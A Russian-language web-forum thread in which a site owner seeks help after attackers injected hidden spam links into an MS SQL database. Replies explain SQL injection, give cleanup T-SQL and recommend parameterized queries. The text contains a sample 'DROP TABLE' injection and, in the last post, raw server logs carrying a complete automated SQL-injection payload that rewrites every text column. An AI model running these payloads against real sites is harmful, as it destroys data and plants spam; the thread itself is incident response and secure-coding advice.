Здравствуйте! Сегодня: Чт, 22 Окт 2020, Ваш IP: 3.238.62.144 Войти через loginza
 
Вход | Регистрация | Забыли пароль?
Мой Kbyte.Ru
> Список форумов Kbyte.Ru - - Базы данных
+ Создать новую тему Страница: 1 · 2
Тема: Поиск текста по шаблону · +  +  дата добавления: 11.12.2014 / 20:29
Автор темы:
anka_x
anka_x
тем: 8 / ответов: 61 / благодарностей: 0 / репутация: 4
ответов: 61
создал(а) тем: 8


Добрый день.

Случилась беда, взломали базу и добавили во все места вредные дополнения. Все вставки начинаются с кода "<div style="display:none">" и заканчиваются "</div>". Между тегами содержатся различные фрагменты текста и ссылки. Хотелось бы программно выискивать эти куски и уничтожать. Помогите составить шаблон для поиска. Спасибо.
Технологии: ASP .NET
 
Ответ # 1 # · +  +  дата добавления: 11.12.2014 / 22:55
Автор ответа:
Алексей Немиро
Алексей Немиро
тем: 534 / ответов: 5130 / благодарностей: 325 / репутация: 211
Чашка Kbyte.Ru>>
Url: aleksey.nemiro.ru
Icq: 261779681
Skype: alekseynemiro
ответов: 5130
создал(а) тем: 534


Текст разный или несколько одинаковых вариаций? Если одинаковый, то быстрее будет силами SQL исправить.

Каким образом взломали? Injection или утёк пароль? Сначало нужно дырку прикрыть, иначе толку от устранения последствий не будет.

Резервные копии часто делаются? Может проще будет восстановить.
 
Ответ # 2 # · +  +  дата добавления: 12.12.2014 / 08:01
Автор ответа:
anka_x
anka_x
тем: 8 / ответов: 61 / благодарностей: 0 / репутация: 4
ответов: 61
создал(а) тем: 8


Текст, наверное, из многих вариаций, их более 20-ти, не уверен, что знаю все.
Резервные копии делаются и хранятся 2 недели, но базу взломали раньше.

Как взломали пока не знаю. Пароль, конечно, поменяю. К описаниям предметов добавили код, например, такой:

<div style="display:none">abortion pills online <a href="http://www.***.com/blog/template">click</a> abortion pills online</div>

То есть, для посетителей изменения не видны, но в коде изменения есть.
 
Ответ # 3 # · +x1 +  дата добавления: 12.12.2014 / 10:56
Автор ответа:
Алексей Немиро
Алексей Немиро
тем: 534 / ответов: 5130 / благодарностей: 325 / репутация: 211
Чашка Kbyte.Ru>>
Url: aleksey.nemiro.ru
Icq: 261779681
Skype: alekseynemiro
ответов: 5130
создал(а) тем: 534


Если SQL Injection, то толку не будет никакого.

Каким образом выполняется работа с БД?

В коде есть запросы вида:
cmd.CommandText = "SELECT * FROM table WHERE id = " + Request("id") + " ORDER BY name"
т.е. когда в sql-запрос вставляются данные из Request или других элементов (текстовые поля и т.п.), переменных.

Подобные запросы являются уязвимыми к SQL Injection, злоумышленник может легко заменить sql-запрос и добавить свой.
В выше показанном примере, злоумышленник может добавить свой запрос в параметр id:
http://example.org/page.aspx?id=0;DROP TABLE table--
Таким образом:
cmd.CommandText = "SELECT * FROM table WHERE id = " + Request("id") + " ORDER BY name"
запрос будет:
SELECT * FROM table WHERE id = 0;DROP TABLE table-- ORDER BY name
Как видно, получается два запроса, первый ни к чему не приведет, а второй, если хватит прав (обычно хватает), удалит из базы таблицу table. Остатки первого запроса просто помещаются в комментарий.

Обычно запросы кодируются, чтобы их было сложнее обнаружить. Но все равно будут видны фрагменты кода SQL в адресах страниц.
Можно поискать в статистике (типа Яндекс.Метрика, или по счетчикам LiveInternet, Mail.Ru и т.п.) адреса, в которые пытаются подставить подозрительный SQL-код. Затем проверить, чтобы в серверном коде этих страниц запросы к базе были безопасными.

И только потом устранять последствия.

Кстати, где хранится строка соединения с базой? Надеюсь в web.config? Если каким-то другим образом, то она могла засветиться на сайте при возникновении исключений (зависит от конфигурации сайта).
 
Ответ # 4 # · +  +  дата добавления: 12.12.2014 / 11:08
Автор ответа:
Алексей Немиро
Алексей Немиро
тем: 534 / ответов: 5130 / благодарностей: 325 / репутация: 211
Чашка Kbyte.Ru>>
Url: aleksey.nemiro.ru
Icq: 261779681
Skype: alekseynemiro
ответов: 5130
создал(а) тем: 534


По устранению, если:
1. Внедренный текст всегда начинается с: <div style="display:none">
2. Внедренный текст всегда заканчивается на: </div>
3. Между <div style="display:none"> и </div> нет других тегов </div>.
4. В нормальном тексте не может быть <div style="display:none">...</div> (по идее, не должно быть style="display:none", т.к. поисковики этого не любят, обычно подобные блоки скрываются JavaScript, либо классами CSS, злоумышленнику это сделать будет сложно, нужно будет в ручную работать, а тут скорее всего делал робот).

То можно на уровне SQL:
1. Проверит все поля и найти подстроку <div style="display:none"> и </div>.
2. Удалить текст между этими подстроками.

Еще вариант, если вредоносный текст находится в конце или в начале нормального, то можно его вырезать. Если в конце, то искать первое вхождение <div style="display:none">. А если в начале, то искать первое вхождение </div>.

Помещать вредоносный текст в конце или начале проще всего для злоумышленника, т.к. не нужно делать дополнительный анализ данных, что увеличит объем кода, при инъекции будет критично (размер строки запроса в url ограничен).
 
Ответ # 5 # · +x1 +  · в избранномx1 дата добавления: 12.12.2014 / 11:16
Автор ответа:
Алексей Немиро
Алексей Немиро
тем: 534 / ответов: 5130 / благодарностей: 325 / репутация: 211
Чашка Kbyte.Ru>>
Url: aleksey.nemiro.ru
Icq: 261779681
Skype: alekseynemiro
ответов: 5130
создал(а) тем: 534


Я когда-то делал SQL-запрос для проверки базы на наличие внедренного текста.
Запрос проверяет все таблицы в базе и ищет в каждом поле типа (n)text и (n)varchar указанный в переменной @search текст.
На выходе будет список таблиц, в которых обнаружена указанная подстрока.
DECLARE @search nvarchar(max);
SET @search = '%<div style="display:none">%'; -- строка поиска, используется оператор LIKE

CREATE TABLE #checked (id int identity not null, table_name varchar(255), found int null);

-- список таблиц
DECLARE @t nvarchar(255);
SELECT TOP 1 @t = TABLE_NAME
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_TYPE=N'BASE TABLE' ORDER BY TABLE_NAME ASC;

--SET @t = 'SNITZ_A_REPLY';

DECLARE @f int;

-- листаем таблицы, пока не кончатся
WHILE @@ROWCOUNT > 0 BEGIN
	SET @f = 0;

  PRINT 'Обработка таблицы ' + @t;
  -- получаем колонки в текущей таблице типа text
  DECLARE @col_name varchar(255), @col_type varchar(255);
  CREATE TABLE #col_chck (id int identity not null, column_name varchar(255), found int);
  SELECT TOP 1 @col_name = COLUMN_NAME, @col_type = DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS 
  WHERE TABLE_NAME = @t AND 
  (DATA_TYPE = 'text' OR DATA_TYPE = 'ntext' OR DATA_TYPE = 'varchar' OR DATA_TYPE = 'nvarchar');
  -- берем каждую колонку и выбираем из таблицы поля длинее 4000 символов
  WHILE @@ROWCOUNT > 0 BEGIN
    DECLARE @q nvarchar(max), @cf int;
    SET @cf = 0;
    SET @q = 
    'SELECT @cnt = COUNT(*) FROM [' + @t + '] WHERE [' + @col_name + '] LIKE ''' + @search + ''';'

    -- выполняем запрос
    BEGIN TRY
      PRINT '..Поле ' + @col_name;
      EXEC sp_executesql  @q, N'@cnt int OUTPUT', @cnt = @cf OUTPUT;
    END TRY
    BEGIN CATCH
      PRINT '****************************** ' + ERROR_MESSAGE();
    END CATCH;

    -- добавляем колонку в лог
    INSERT INTO #col_chck
    SELECT @col_name, ISNULL(@cf, 0);

		SET @f = @f + ISNULL(@cf, 0);

    -- остальные колонки, исключая проверенные
    SELECT TOP 1 @col_name = COLUMN_NAME, @col_type = DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS 
    WHERE TABLE_NAME = @t 
    AND
    COLUMN_NAME NOT IN (SELECT column_name FROM #col_chck)
    AND 
    (DATA_TYPE = 'text' OR DATA_TYPE = 'ntext' OR DATA_TYPE = 'varchar' OR DATA_TYPE = 'nvarchar');
  END;

	SELECT @f = SUM(found) FROM #col_chck;

	PRINT '...Найдено подстрок ' + CAST(ISNULL(@f, 0) AS nvarchar(10));

	DROP TABLE #col_chck;

  INSERT INTO #checked
  SELECT @t, ISNULL(@f, 0);

  -- проверяем оставшиеся таблицы, исключая уже проверенные
  SELECT TOP 1 @t = TABLE_NAME
  FROM INFORMATION_SCHEMA.TABLES
  WHERE TABLE_TYPE=N'BASE TABLE' AND 
  TABLE_NAME NOT IN (SELECT table_name FROM #checked)
  ORDER BY TABLE_NAME ASC;
END;

SELECT * FROM #checked WHERE found > 0 ORDER BY table_name ASC;

DROP TABLE #checked;
 
Ответ # 6 # · +  +  дата добавления: 12.12.2014 / 11:58
Автор ответа:
Алексей Немиро
Алексей Немиро
тем: 534 / ответов: 5130 / благодарностей: 325 / репутация: 211
Чашка Kbyte.Ru>>
Url: aleksey.nemiro.ru
Icq: 261779681
Skype: alekseynemiro
ответов: 5130
создал(а) тем: 534


Еще вариант по восстановлению: Если есть резервная копия без внедренного текста, то можно развернуть ее параллельно и проверить текущую базу с резервной копией. Восстановить из резервной копии тексты, которые будут найдены в текущей (если они не менялись). Тогда останется проверить только данные, которые появились позже (их должно быть существенно меньше, может даже в ручную можно будет пройтись). Это тоже на уровне SQL можно реализовать.
 
Ответ # 7 # · +  +  дата добавления: 12.12.2014 / 17:06
Автор ответа:
anka_x
anka_x
тем: 8 / ответов: 61 / благодарностей: 0 / репутация: 4
ответов: 61
создал(а) тем: 8


Спасибо Вам огромное, Алексей, за столь подробное и разностороннее исследование проблемы.
Конечно, на сайте используются запросы типа Request("id"), также, как и на этой странице Вашего форума.
Попробую в начале страницы определять длину Request("id") и перенаправлять все, длиннее 5 знаков (к примеру). Это по-человечески?

Все вставки расположены в конце текста. Попробую по Вашей наводке выискивать первое вхождение <div style="display:none"> (чего я никогда не использовал) и удалять все до конца текста.
 
Ответ # 8 # · +  +  дата добавления: 12.12.2014 / 17:23
Автор ответа:
Алексей Немиро
Алексей Немиро
тем: 534 / ответов: 5130 / благодарностей: 325 / репутация: 211
Чашка Kbyte.Ru>>
Url: aleksey.nemiro.ru
Icq: 261779681
Skype: alekseynemiro
ответов: 5130
создал(а) тем: 534


Попробую в начале страницы определять длину Request("id") и перенаправлять все, длиннее 5 знаков (к примеру). Это по-человечески?
Нет. Единственное правильное решение - использовать параметризованные запросы.

У объекта SqlCommand есть свойство Paramters, через которое можно вставлять в SQL-запрос параметры. При этом не нужно думать о формате и безопасности передаваемых данных, т.к. все уже придумано, сделано и надежность проверена годами.

Безопасный запрос к базе должен формироваться следующим образом:
Dim cmd As New SqlCommand("SELECT * FROM tableName WHERE id = @id")
cmd.Parameters.Add("@id", SqlDbType.Int).Value = Request("id")

Переменная @id в SQL запросе будет автоматически заменена на значение Request("id").
При этом будет проверен тип данных. Если тип окажется неверным, возникнет исключение, запрос не будет выполнен.
В строковые типах экранируются кавычки, что исключает внедрение подзапросов в параметры запроса.
Для дат будет автоматически нормализован формат, в зависимости от параметров сайта и SQL Server.

Dim cmd As New SqlCommand("INSERT INTO tableName (title, main_text, hit, date_created) VALUES (@title, @main_test, @hit, @date_created)")
cmd.Parameters.Add("@title", SqlDbType.NVarChar, 100).Value = "Привет, мир!"
cmd.Parameters.Add("@main_text", SqlDbType.NVarChar).Value = "много текста может быть здесь"
cmd.Parameters.Add("@hit", SqlDbType.Int).Value = 123
cmd.Parameters.Add("@date_created", SqlDbType.DateTime).Value = Now
 
Ответ # 9 # · +  +  дата добавления: 12.12.2014 / 17:24
Автор ответа:
anka_x
anka_x
тем: 8 / ответов: 61 / благодарностей: 0 / репутация: 4
ответов: 61
создал(а) тем: 8


Зашел на Я.Метрику, действительно есть какие-то добавки к адресам, которые я никогда не использовал. Например: fmode=inject или relation=parent...
 
Ответ # 10 # · +  +  дата добавления: 12.12.2014 / 17:34
Автор ответа:
Алексей Немиро
Алексей Немиро
тем: 534 / ответов: 5130 / благодарностей: 325 / репутация: 211
Чашка Kbyte.Ru>>
Url: aleksey.nemiro.ru
Icq: 261779681
Skype: alekseynemiro
ответов: 5130
создал(а) тем: 534


Все вставки расположены в конце текста. Попробую по Вашей наводке выискивать первое вхождение <div style="display:none"> (чего я никогда не использовал) и удалять все до конца текста.
Если в других частях текста точно нет подстроки <div style="display:none">, то простой запрос на удаление может выглядеть так:
-- это тест-пример, показывает, как работает
DECLARE @killFrom nvarchar(max)
SET @killFrom = '<div style="display:none">'

DECLARE @text nvarchar(max);

SET @text ='какой-то текс
раз
два три<div style="display:none">11111</div>'

SELECT LEFT(@text, CHARINDEX(@killFrom, @text) - 1)
-- тест-пример 2, показывает, что текст после внедренного, тоже будет удален
DECLARE @killFrom nvarchar(max)
SET @killFrom = '<div style="display:none">'

DECLARE @text nvarchar(max);

SET @text ='какой-то текст, который останется без изменений
<div style="display:none">этот текст будет удален, начиная с тега div</div>

этот текст после внедренного и он тоже будет удален'

SELECT LEFT(@text, CHARINDEX(@killFrom, @text) - 1)
Использовать в реальных условиях (без всего, что выше показано):
-- запрос найдет в поле fieldName текст '<div style="display:none">' и удалит все до конца, начиная с этой строки
DECLARE @killFrom nvarchar(max)
SET @killFrom = '<div style="display:none">'

UPDATE tableName SET fieldName = LEFT(fieldName , CHARINDEX(@killFrom, fieldName) - 1)
WHERE CHARINDEX(@killFrom, fieldName) <> 0;

ВАЖНО не забыть сделать резервную копию, чтобы если что, можно было восстановить.
 
Ответ # 11 # · +  +  дата добавления: 12.12.2014 / 18:00
Автор ответа:
anka_x
anka_x
тем: 8 / ответов: 61 / благодарностей: 0 / репутация: 4
ответов: 61
создал(а) тем: 8


Безопасный запрос к базе должен формироваться следующим образом:

1 Dim cmd As New SqlCommand("SELECT * FROM tableName WHERE id = @id")
2 cmd.Parameters.Add("@id", SqlDbType.Int).Value = Request("id")


Когда я добавляю параметр к своему запросу, ругается:
BC30456: "Parameters" не является членом "System.Data.OleDb.OleDbDataAdapter".

Запрос такой:
DBCommand = New OleDbDataAdapter _
("Select * From Pressa Where PressaID = @PressaID", DBConnSite)
DBCommand.Parameters.Add("@PressaID", SqlDbType.Int).Value = Request.QueryString("PressaID")
 
Ответ # 12 # · +  +  дата добавления: 12.12.2014 / 18:10
Автор ответа:
Алексей Немиро
Алексей Немиро
тем: 534 / ответов: 5130 / благодарностей: 325 / репутация: 211
Чашка Kbyte.Ru>>
Url: aleksey.nemiro.ru
Icq: 261779681
Skype: alekseynemiro
ответов: 5130
создал(а) тем: 534


База Access?
Тогда все что я сказал выше можно проигнорировать. Мои ответы относятся к SQL Server.
С Access уже давно не работал, сходу не смогу ничего порекомендовать.

Access плох для сайтов, мягко говоря очень плох.

Для OldDb нужно использовать OldDb, а не SqlDb. Типы у Access другие, в перечислении студия сама покажет, какие есть. Int - это Integer.

Access важно соблюдать последовательность добавления параметров в запрос и в Command.
DBCommand = New OleDbDataAdapter
DataAdapter неудобен, лучше сделать Command и просто передать его в DataAdapter.
 
Ответ # 13 # · +  +  дата добавления: 12.12.2014 / 18:35
Автор ответа:
anka_x
anka_x
тем: 8 / ответов: 61 / благодарностей: 0 / репутация: 4
ответов: 61
создал(а) тем: 8


Нет, база MS SQL, но код сайта очень старый. )


Dim DBCommand As OleDbDataAdapter
Dim DBConnSite as OleDbConnection = New OleDbConnection(System.Configuration.ConfigurationSettings.AppSettings("Site"))
 
Ответ # 14 # · +  +  дата добавления: 12.12.2014 / 18:47
Автор ответа:
Алексей Немиро
Алексей Немиро
тем: 534 / ответов: 5130 / благодарностей: 325 / репутация: 211
Чашка Kbyte.Ru>>
Url: aleksey.nemiro.ru
Icq: 261779681
Skype: alekseynemiro
ответов: 5130
создал(а) тем: 534


И что, работа с базой делается через OleDb? Это действительно работает

Лучше объекты на Sql заменить.
Dim DBCommand As OleDbDataAdapter
Dim DBConnSite as OleDbConnection = New OleDbConnection(System.Configuration.ConfigurationSettings.AppSettings("Site"))

Dim conn As New SqlConnection(System.Configuration.ConfigurationSettings.AppSettings("Site"))
conn.Open()
Dim cmd As New SqlCommand("текст запроса тут", conn)
' параметры
cmd.Parameters.Add("@id", SqlDbType.Int).Value = Request("id")
' ...
'если нужна таблица данных, то
Dim table As New DataTable()
Dim adapter As New SqlDataAdapter(cmd)
adapter.Fill(table)
' все, в table должна быть таблица данных
conn.Close()
 
Ответ # 15 # · +  +  дата добавления: 12.12.2014 / 19:26
Автор ответа:
anka_x
anka_x
тем: 8 / ответов: 61 / благодарностей: 0 / репутация: 4
ответов: 61
создал(а) тем: 8


И что, работа с базой делается через OleDb? Это действительно работает


Да, работает, сам удивляюсь. )

Просто заменить OleDB на SQL на получается, буду стараться.

Покушаются на базу, как правило, через URL или через форму текста asp:TextBox тоже можно?
 
Ответ # 16 # · +  +  дата добавления: 12.12.2014 / 19:50
Автор ответа:
Алексей Немиро
Алексей Немиро
тем: 534 / ответов: 5130 / благодарностей: 325 / репутация: 211
Чашка Kbyte.Ru>>
Url: aleksey.nemiro.ru
Icq: 261779681
Skype: alekseynemiro
ответов: 5130
создал(а) тем: 534


Через тектовые поля сложнее, т.к. нужно делать POST запрос. Но тоже возможно. Нужно всегда использовать параметризованные запросы, тогда проблем не будет.
 
Ответ # 17 # · +  +  дата добавления: 23.02.2015 / 21:26
Автор ответа:
anka_x
anka_x
тем: 8 / ответов: 61 / благодарностей: 0 / репутация: 4
ответов: 61
создал(а) тем: 8


Алексей, добрый день.
С Праздником Вас!!! Будьте здоровы и счастливы! :)

У меня опять беда... Сегодня опять попортили базу, негодяи...
В лог-файлах, среди прочих, нашел строчки, в которых я ничего не понял, посмотрите, пожалуйста. Что бы это значило?

2015-02-23 17:25:33 GET /info.aspx infoid=20';declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''why%20men%20cheat%20on%20beautiful%20women%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''blog.armanda.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''women-who-cheat-with-married-men.aspx%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''husbands%20that%20cheat''%20when%201%20then%20''click%20here''%20else%20''married%20cheaters''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20click%20here''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">why+men+cheat+on+beautiful+women+<a+href="http://blog.armanda.com/page/women-who-cheat-with-married-men.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''husbands+that+cheat''+when+1+then+''click+here''+else+''married+cheaters''+end++''</a>+click+here</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">why+men+cheat+on+beautiful+women+<a+href="http://blog.armanda.com/page/women-who-cheat-with-married-men.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''husbands+that+cheat''+when+1+then+''click+here''+else+''married+cheaters''+end++''</a>+click+here</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 302 458 3361 31
2015-02-23 17:25:33 GET /error.aspx aspxerrorpath=/info.aspx 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">why+men+cheat+on+beautiful+women+<a+href="http://blog.armanda.com/page/women-who-cheat-with-married-men.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''husbands+that+cheat''+when+1+then+''click+here''+else+''married+cheaters''+end++''</a>+click+here</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">why+men+cheat+on+beautiful+women+<a+href="http://blog.armanda.com/page/women-who-cheat-with-married-men.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''husbands+that+cheat''+when+1+then+''click+here''+else+''married+cheaters''+end++''</a>+click+here</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 200 7108 2122 0
2015-02-23 17:25:37 GET /info.aspx infoid=20;declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''why%20men%20cheat%20on%20beautiful%20women%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''blog.armanda.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''women-who-cheat-with-married-men.aspx%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''husbands%20that%20cheat''%20when%201%20then%20''click%20here''%20else%20''married%20cheaters''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20click%20here''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0;declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">why+men+cheat+on+beautiful+women+<a+href="http://blog.armanda.com/page/women-who-cheat-with-married-men.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''husbands+that+cheat''+when+1+then+''click+here''+else+''married+cheaters''+end++''</a>+click+here</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com;declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">why+men+cheat+on+beautiful+women+<a+href="http://blog.armanda.com/page/women-who-cheat-with-married-men.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''husbands+that+cheat''+when+1+then+''click+here''+else+''married+cheaters''+end++''</a>+click+here</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 200 31502 3358 2734
2015-02-23 17:25:40 GET /info.aspx infoid=20);declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''why%20men%20cheat%20on%20beautiful%20women%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''blog.armanda.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''women-who-cheat-with-married-men.aspx%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''husbands%20that%20cheat''%20when%201%20then%20''click%20here''%20else%20''married%20cheaters''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20click%20here''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 202.6.132.70 HTTP/1.0 